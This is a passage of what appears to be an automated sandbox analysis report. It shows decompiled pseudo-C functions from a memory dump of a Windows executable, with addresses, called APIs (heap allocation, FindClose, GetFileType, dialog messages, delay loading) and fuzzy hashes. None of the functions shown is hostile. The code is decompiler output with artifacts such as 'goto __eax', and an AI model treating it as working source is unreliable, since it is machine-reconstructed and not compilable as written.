    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 6f5fec0c36bbc145cb67a0e62e1ecb79f5c2867a708c15a5e5143fdd4c660255
    • Instruction ID: 67c884b38f331e56bac18d7ab28628bdcf5bd1c55efdb690bc6eec1194a59fcd
    • Opcode Fuzzy Hash: 6f5fec0c36bbc145cb67a0e62e1ecb79f5c2867a708c15a5e5143fdd4c660255
    • Instruction Fuzzy Hash: 73F03C319147099EDB38DA28C88172A77E4FB65321F208E2AE4D5C7690EB70D98587D2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E00857B91(void* __ecx, signed int _a4, signed int _a8) {
    				void* __esi;
    				void* _t8;
    				void* _t12;
    				signed int _t13;
    				void* _t15;
    				signed int _t16;
    				signed int _t18;
    				long _t19;
    
    				_t15 = __ecx;
    				_t18 = _a4;
    				if(_t18 == 0) {
    					L2:
    					_t19 = _t18 * _a8;
    					if(_t19 == 0) {
    						_t19 = _t19 + 1;
    					}
    					while(1) {
    						_t8 = RtlAllocateHeap( *0x890874, 8, _t19); // executed
    						if(_t8 != 0) {
    							break;
    						}
    						__eflags = E0085797C();
    						if(__eflags == 0) {
    							L8:
    							 *((intOrPtr*)(E00857F42())) = 0xc;
    							__eflags = 0;
    							return 0;
    						}
    						_t12 = E008567A8(_t15, _t16, _t19, __eflags, _t19);
    						_pop(_t15);
    						__eflags = _t12;
    						if(_t12 == 0) {
    							goto L8;
    						}
    					}
    					return _t8;
    				}
    				_t13 = 0xffffffe0;
    				_t16 = _t13 % _t18;
    				if(_t13 / _t18 < _a8) {
    					goto L8;
    				}
    				goto L2;
    			}











    0x00857b91
    0x00857b97
    0x00857b9c
    0x00857baa
    0x00857baa
    0x00857bb0
    0x00857bb2
    0x00857bb2
    0x00857bc9
    0x00857bd2
    0x00857bda
    0x00000000
    0x00000000
    0x00857bba
    0x00857bbc
    0x00857bde
    0x00857be3
    0x00857be9
    0x00000000
    0x00857be9
    0x00857bbf
    0x00857bc4
    0x00857bc5
    0x00857bc7
    0x00000000
    0x00000000
    0x00857bc7
    0x00000000
    0x00857bc9
    0x00857ba2
    0x00857ba3
    0x00857ba8
    0x00000000
    0x00000000
    0x00000000

    APIs
    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0085859F,00000001,00000364,?,00852E6F,?,?,008700E0), ref: 00857BD2
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: 1996c70ce8d303406592304543f82a12b798278efeb53e9b7d7b8c2c5206b773
    • Instruction ID: debd2d3d01435a12415e1ceeb271f515c798e7681a654d652d9d0ca0ddca6aa3
    • Opcode Fuzzy Hash: 1996c70ce8d303406592304543f82a12b798278efeb53e9b7d7b8c2c5206b773
    • Instruction Fuzzy Hash: C6F0BE3120C5296BAB216A26BD05F5A3B9DFF41772B29C572AC09E6184CA30D80886E3
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E00857B00(void* __ecx, long _a4) {
    				void* __esi;
    				void* _t4;
    				void* _t6;
    				void* _t7;
    				void* _t8;
    				long _t9;
    
    				_t7 = __ecx;
    				_t9 = _a4;
    				if(_t9 > 0xffffffe0) {
    					L7:
    					 *((intOrPtr*)(E00857F42())) = 0xc;
    					__eflags = 0;
    					return 0;
    				}
    				if(_t9 == 0) {
    					_t9 = _t9 + 1;
    				}
    				while(1) {
    					_t4 = RtlAllocateHeap( *0x890874, 0, _t9); // executed
    					if(_t4 != 0) {
    						break;
    					}
    					__eflags = E0085797C();
    					if(__eflags == 0) {
    						goto L7;
    					}
    					_t6 = E008567A8(_t7, _t8, _t9, __eflags, _t9);
    					_pop(_t7);
    					__eflags = _t6;
    					if(_t6 == 0) {
    						goto L7;
    					}
    				}
    				return _t4;
    			}









    0x00857b00
    0x00857b06
    0x00857b0c
    0x00857b3e
    0x00857b43
    0x00857b49
    0x00000000
    0x00857b49
    0x00857b10
    0x00857b12
    0x00857b12
    0x00857b29
    0x00857b32
    0x00857b3a
    0x00000000
    0x00000000
    0x00857b1a
    0x00857b1c
    0x00000000
    0x00000000
    0x00857b1f
    0x00857b24
    0x00857b25
    0x00857b27
    0x00000000
    0x00000000
    0x00857b27
    0x00000000

    APIs
    • RtlAllocateHeap.NTDLL(00000000,?,?,?,00853006,?,0000015D,?,?,?,?,008544E2,000000FF,00000000,?,?), ref: 00857B32
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: 5106db5f530625abbda1aeb11b44931db9eeaf1a096b26294f004591c27a1fac
    • Instruction ID: 3c46a49c47045704337fd13deb213213e2772c398df22885da5c8a3c5d855b17
    • Opcode Fuzzy Hash: 5106db5f530625abbda1aeb11b44931db9eeaf1a096b26294f004591c27a1fac
    • Instruction Fuzzy Hash: 67E0E53120911557DA212625BC05B5A764DFF413B3F558122AC15E2090DB21CC0883E3
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E00835B2D(intOrPtr __ecx, void* __eflags) {
    				void* _t36;
    
    				E0084D8C4(E0086129A, __ecx);
    				_push(__ecx);
    				 *((intOrPtr*)(_t36 - 0x10)) = __ecx;
    				E0083ADBF(__ecx); // executed
    				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
    				E0083FB1C();
    				 *(_t36 - 4) = 1;
    				E0083FB1C();
    				 *(_t36 - 4) = 2;
    				E0083FB1C();
    				 *(_t36 - 4) = 3;
    				E0083FB1C();
    				 *(_t36 - 4) = 4;
    				E0083FB1C();
    				 *(_t36 - 4) = 5;
    				E00835D22(__ecx,  *(_t36 - 4));
    				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
    				return __ecx;
    			}




    0x00835b32
    0x00835b37
    0x00835b3b
    0x00835b3e
    0x00835b43
    0x00835b4d
    0x00835b58
    0x00835b5c
    0x00835b67
    0x00835b6b
    0x00835b76
    0x00835b7a
    0x00835b85
    0x00835b89
    0x00835b90
    0x00835b94
    0x00835b9f
    0x00835ba9

    APIs
    • __EH_prolog.LIBCMT ref: 00835B32
      • Part of subcall function 0083ADBF: __EH_prolog.LIBCMT ref: 0083ADC4
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: b58312a3043c1b43fb403dd2e195b692de619c2dff291cf839925918df8385ef
    • Instruction ID: 49418d2ec8ded59afa4702923127376055f892949a57253b47fb8773c860bcb8
    • Opcode Fuzzy Hash: b58312a3043c1b43fb403dd2e195b692de619c2dff291cf839925918df8385ef
    • Instruction Fuzzy Hash: B0016DB0A05694DAD715E7ACE1263EDF7A4EF55314F0008ADB549D3283DBB82B0487E3
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E00839572(void* __ecx) {
    				void* _t16;
    				void* _t21;
    
    				_t21 = __ecx;
    				_t16 = 1;
    				if( *(__ecx + 4) != 0xffffffff) {
    					if( *((char*)(__ecx + 0x10)) == 0 &&  *((intOrPtr*)(__ecx + 0xc)) == 0) {
    						_t5 = FindCloseChangeNotification( *(__ecx + 4)) - 1; // -1
    						asm("sbb bl, bl");
    						_t16 =  ~_t5 + 1;
    					}
    					 *(_t21 + 4) =  *(_t21 + 4) | 0xffffffff;
    				}
    				 *(_t21 + 0xc) =  *(_t21 + 0xc) & 0x00000000;
    				if(_t16 == 0 &&  *((intOrPtr*)(_t21 + 0x14)) != _t16) {
    					E00836D95(0x8700e0, _t21 + 0x1e);
    				}
    				return _t16;
    			}





    0x00839574
    0x00839576
    0x0083957c
    0x00839582
    0x00839593
    0x00839598
    0x0083959a
    0x0083959a
    0x0083959c
    0x0083959c
    0x008395a0
    0x008395a6
    0x008395b6
    0x008395b6
    0x008395bf

    APIs
    • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00839542), ref: 0083958D
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ChangeCloseFindNotification
    • String ID:
    • API String ID: 2591292051-0
    • Opcode ID: 4f78d0e74e8a84d16b10d7e9279f71c7c56621e6d0c1013b5cfd31aca51ee220
    • Instruction ID: 9fce24a7fa17cf7955d31846eedf435d499864e96cda0791ae6c454201859dd7
    • Opcode Fuzzy Hash: 4f78d0e74e8a84d16b10d7e9279f71c7c56621e6d0c1013b5cfd31aca51ee220
    • Instruction Fuzzy Hash: E6F08270442B049EEB319B24C549792B7E4FB56731F048B1ED0EAC35E0D3A1A88DCF91
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 58%
    			E0083A255(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
    				void* _t12;
    				intOrPtr _t20;
    
    				_t20 = _a8;
    				 *((char*)(_t20 + 0x1044)) = 0;
    				if(E0083B682(_a4) == 0) {
    					_t12 = E0083A383(__edx, 0xffffffff, _a4, _t20);
    					if(_t12 == 0xffffffff) {
    						goto L1;
    					}
    					FindClose(_t12); // executed
    					 *(_t20 + 0x1040) =  *(_t20 + 0x1040) & 0x00000000;
    					 *((char*)(_t20 + 0x100c)) = E00839F71( *((intOrPtr*)(_t20 + 0x1008)));
    					 *((char*)(_t20 + 0x100d)) = E00839F89( *((intOrPtr*)(_t20 + 0x1008)));
    					return 1;
    				}
    				L1:
    				return 0;
    			}





    0x0083a256
    0x0083a25e
    0x0083a26c
    0x0083a279
    0x0083a281
    0x00000000
    0x00000000
    0x0083a284
    0x0083a290
    0x0083a2a2
    0x0083a2ad
    0x00000000
    0x0083a2b3
    0x0083a26e
    0x00000000

    APIs
    • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0083A284
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: CloseFind
    • String ID:
    • API String ID: 1863332320-0
    • Opcode ID: e0ae17dc0d0a1be270f3b0cc739d0feca79afda458cda54b72f116b171e63ccf
    • Instruction ID: e73e0a0408fe23a365fb1f2eca1b7e85b15d7b7fda2c652ea6466bc228949352
    • Opcode Fuzzy Hash: e0ae17dc0d0a1be270f3b0cc739d0feca79afda458cda54b72f116b171e63ccf
    • Instruction Fuzzy Hash: 23F0E93100D780AACB2267B8C804BC77B95FF95331F048A49F5FEC2192C2B6548987A3
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00831E9F(intOrPtr* __ecx, intOrPtr __edx, void* __esi) {
    				intOrPtr _t14;
    				void* _t23;
    
    				E0084D8C4(E00861201, __ecx);
    				_t14 =  *((intOrPtr*)(__ecx + 0x21bc));
    				if( *((char*)(_t14 + 0x6152)) == 0) {
    					 *((intOrPtr*)(_t23 - 0x20)) = 0;
    					 *((intOrPtr*)(_t23 - 0x1c)) = 0;
    					 *((intOrPtr*)(_t23 - 0x18)) = 0;
    					 *((intOrPtr*)(_t23 - 0x14)) = 0;
    					 *((char*)(_t23 - 0x10)) = 0;
    					 *((intOrPtr*)(_t23 - 4)) = 0;
    					_t9 = _t23 - 0x20; // 0x7e0
    					E00831906(__ecx, __edx, __esi, _t9);
    					_t10 = _t23 - 0x20; // 0x7e0
    					_t14 = E008315D4(_t10);
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t23 - 0xc));
    				return _t14;
    			}





    0x00831ea4
    0x00831ea9
    0x00831eb9
    0x00831ebd
    0x00831ec0
    0x00831ec3
    0x00831ec6
    0x00831ec9
    0x00831ecc
    0x00831ecf
    0x00831ed3
    0x00831ed8
    0x00831edb
    0x00831edb
    0x00831ee3
    0x00831eed

    APIs
    • __EH_prolog.LIBCMT ref: 00831EA4
      • Part of subcall function 00831906: __EH_prolog.LIBCMT ref: 0083190B
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: 660d9f42780044e2b4eb9f63d4ed0c933cab3839942d75c69dfc364f94ff1a97
    • Instruction ID: d091c49f2beea6a00af7f6f085dccb3dc9dc00d0dd23c0d50dc35e5501470a28
    • Opcode Fuzzy Hash: 660d9f42780044e2b4eb9f63d4ed0c933cab3839942d75c69dfc364f94ff1a97
    • Instruction Fuzzy Hash: 4DF098B1D042498ECF41DFECC5496EDBBB1FB59701F0445BAD409E7202E7355644CBA2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00831EA4(intOrPtr* __ecx, intOrPtr __edx, void* __esi) {
    				void* _t12;
    				intOrPtr _t14;
    				void* _t23;
    
    				E0084D8C4(_t12, __ecx);
    				_t14 =  *((intOrPtr*)(__ecx + 0x21bc));
    				if( *((char*)(_t14 + 0x6152)) == 0) {
    					 *((intOrPtr*)(_t23 - 0x20)) = 0;
    					 *((intOrPtr*)(_t23 - 0x1c)) = 0;
    					 *((intOrPtr*)(_t23 - 0x18)) = 0;
    					 *((intOrPtr*)(_t23 - 0x14)) = 0;
    					 *((char*)(_t23 - 0x10)) = 0;
    					 *((intOrPtr*)(_t23 - 4)) = 0;
    					_t9 = _t23 - 0x20; // 0x7e0
    					E00831906(__ecx, __edx, __esi, _t9);
    					_t10 = _t23 - 0x20; // 0x7e0
    					_t14 = E008315D4(_t10);
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t23 - 0xc));
    				return _t14;
    			}






    0x00831ea4
    0x00831ea9
    0x00831eb9
    0x00831ebd
    0x00831ec0
    0x00831ec3
    0x00831ec6
    0x00831ec9
    0x00831ecc
    0x00831ecf
    0x00831ed3
    0x00831ed8
    0x00831edb
    0x00831edb
    0x00831ee3
    0x00831eed

    APIs
    • __EH_prolog.LIBCMT ref: 00831EA4
      • Part of subcall function 00831906: __EH_prolog.LIBCMT ref: 0083190B
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: 227b414101ecef702655c4b24e983e4544fb90e92d0f7a3ba207c890273304ee
    • Instruction ID: 0cd86f9ab12e70c9b356b74b9b62cab3b413c20cc4eccb6feb3d0a5141056137
    • Opcode Fuzzy Hash: 227b414101ecef702655c4b24e983e4544fb90e92d0f7a3ba207c890273304ee
    • Instruction Fuzzy Hash: 2BF092B1D042898ECF41DFA8C5496EEBBB1FB58700F0445BAD809E7202EB355604CBA2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 75%
    			E008402FF() {
    				void* __esi;
    				void* _t2;
    
    				E00840FD7(); // executed
    				_t2 = E00840FDC();
    				if(_t2 != 0) {
    					_t2 = E00836DE3(_t2, 0x8700e0, 0xff, 0xff);
    				}
    				if( *0x8700eb != 0) {
    					_t2 = E00836DE3(_t2, 0x8700e0, 0xff, 0xff);
    				}
    				__imp__SetThreadExecutionState(1);
    				return _t2;
    			}





    0x00840301
    0x00840306
    0x00840317
    0x0084031c
    0x0084031c
    0x00840328
    0x0084032d
    0x0084032d
    0x00840334
    0x0084033c

    APIs
    • SetThreadExecutionState.KERNEL32 ref: 00840334
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ExecutionStateThread
    • String ID:
    • API String ID: 2211380416-0
    • Opcode ID: e6d5375d156b2819238cfb5cda5f11d9a97686cf7b55f6d37fc13ccca98b91cf
    • Instruction ID: 030d453e83b0c84ebebe46162fc6319dd081d2a16dcbe89407cd2172b06e0512
    • Opcode Fuzzy Hash: e6d5375d156b2819238cfb5cda5f11d9a97686cf7b55f6d37fc13ccca98b91cf
    • Instruction Fuzzy Hash: 59D0C220B0041866DA21776C68457FF1906FFC1320F094066B20AF62D2DAA54C8A8AA3
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 68%
    			E00849642(signed int __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8) {
    				signed int _v8;
    				void* _t6;
    
    				_push(__ecx);
    				_push(0x10);
    				L0084D84A();
    				_v8 = __eax;
    				if(__eax == 0) {
    					return 0;
    				}
    				_t6 = E00849401(__eax, _a4, _a8); // executed
    				return _t6;
    			}





    0x00849645
    0x00849646
    0x00849648
    0x0084964d
    0x00849652
    0x00000000
    0x00849663
    0x0084965c
    0x00000000

    APIs
    • GdipAlloc.GDIPLUS(00000010), ref: 00849648
      • Part of subcall function 00849401: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00849422
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Gdip$AllocBitmapCreateFromStream
    • String ID:
    • API String ID: 1915507550-0
    • Opcode ID: f9ecb590552b2b580b1cf5339642e2c4e000770527f6ba0c64e2eb0109c3f4cc
    • Instruction ID: bbea64148871e99652d38a3c5efd0f1c3ce0520241123bf19140ac5cc7fd45df
    • Opcode Fuzzy Hash: f9ecb590552b2b580b1cf5339642e2c4e000770527f6ba0c64e2eb0109c3f4cc
    • Instruction Fuzzy Hash: 64D0A73060420C7ADF506F68CC02D7B7A9DFB10300F008075FC45C5251F972CD11A252
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E008397E9(void* __ecx) {
    				long _t3;
    
    				if( *(__ecx + 4) != 0xffffffff) {
    					_t3 = GetFileType( *(__ecx + 4)); // executed
    					if(_t3 == 2 || _t3 == 3) {
    						return 1;
    					} else {
    						return 0;
    					}
    				} else {
    					return 0;
    				}
    			}




    0x008397ed
    0x008397f5
    0x008397fe
    0x0083980b
    0x00839805
    0x00839807
    0x00839807
    0x008397ef
    0x008397f1
    0x008397f1

    APIs
    • GetFileType.KERNELBASE(000000FF,0083971B), ref: 008397F5
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: FileType
    • String ID:
    • API String ID: 3081899298-0
    • Opcode ID: 4312290fd9fd410d0cd75907c82753448b416987acbf7dcc2700c45f25d24c57
    • Instruction ID: 5873268a4e5f5c31b4e14c930caed8155ecc278b9161cec58304e5af6935e3af
    • Opcode Fuzzy Hash: 4312290fd9fd410d0cd75907c82753448b416987acbf7dcc2700c45f25d24c57
    • Instruction Fuzzy Hash: 2FD01230021551A58F314A384D494956A51FBC3366F38CAF4D0A6C40E1C763C843F581
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0084CA54(intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
    
    				SendDlgItemMessageW( *0x8775e8, 0x6a, 0x402, E0083F77F(_a20, _a24, _a28, _a32), 0); // executed
    				return E0084A3FB();
    			}



    0x0084ca79
    0x0084ca84

    APIs
    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0084CA79
      • Part of subcall function 0084A3FB: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0084A40C
      • Part of subcall function 0084A3FB: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0084A41D
      • Part of subcall function 0084A3FB: TranslateMessage.USER32(?), ref: 0084A427
      • Part of subcall function 0084A3FB: DispatchMessageW.USER32(?), ref: 0084A431
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Message$DispatchItemPeekSendTranslate
    • String ID:
    • API String ID: 4142818094-0
    • Opcode ID: 018607fee5f35410b1a6fc8f73bffa0b7eaaddfeb432f7e1eabe602b4721498e
    • Instruction ID: 5da6879fcee105d896f3640fa97ccd486293ba02bfc50057a712632c76b0c4b9
    • Opcode Fuzzy Hash: 018607fee5f35410b1a6fc8f73bffa0b7eaaddfeb432f7e1eabe602b4721498e
    • Instruction Fuzzy Hash: 97D09E72558300AAD6012B51CE07F1A7AA2FB9CB05F014554B349740B186A3DD619B42
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 58%
    			E0084D82F() {
    				void* _t3;
    				void* _t4;
    				void* _t8;
    				void* _t9;
    				void* _t10;
    
    				_push(_t4);
    				E0084D58F(_t3, _t4, _t8, _t9, _t10, 0x86ac94, 0x86deb4); // executed
    				goto __eax;
    			}








    0x0084d839
    0x0084d841
    0x0084d848

    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0084D841
      • Part of subcall function 0084D58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084D60C
      • Part of subcall function 0084D58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084D61D
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 202abb380abcbda3eeb2c2f93f9effd1919eb499a309cf670c5cc33e54ac94c0
    • Instruction ID: 8978a21b09efb97ce876ca393076ca72a6be2b95e6b9c80716414d9119090f17
    • Opcode Fuzzy Hash: 202abb380abcbda3eeb2c2f93f9effd1919eb499a309cf670c5cc33e54ac94c0
    • Instruction Fuzzy Hash: 24B0128A358309BDB10861441F02C3A020CF1D8B19332853BB421E404098461C050033
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 58%
    			E0084D1F9() {
    				void* _t3;
    				void* _t4;
    				void* _t8;
    				void* _t9;
    				void* _t10;
    
    				_push(_t4);
    				E0084D58F(_t3, _t4, _t8, _t9, _t10, 0x86ac34, 0x86df08); // executed
    				goto __eax;
    			}








    0x0084d203
    0x0084d20b
    0x0084d212

    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0084D20B
      • Part of subcall function 0084D58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084D60C
      • Part of subcall function 0084D58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084D61D
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
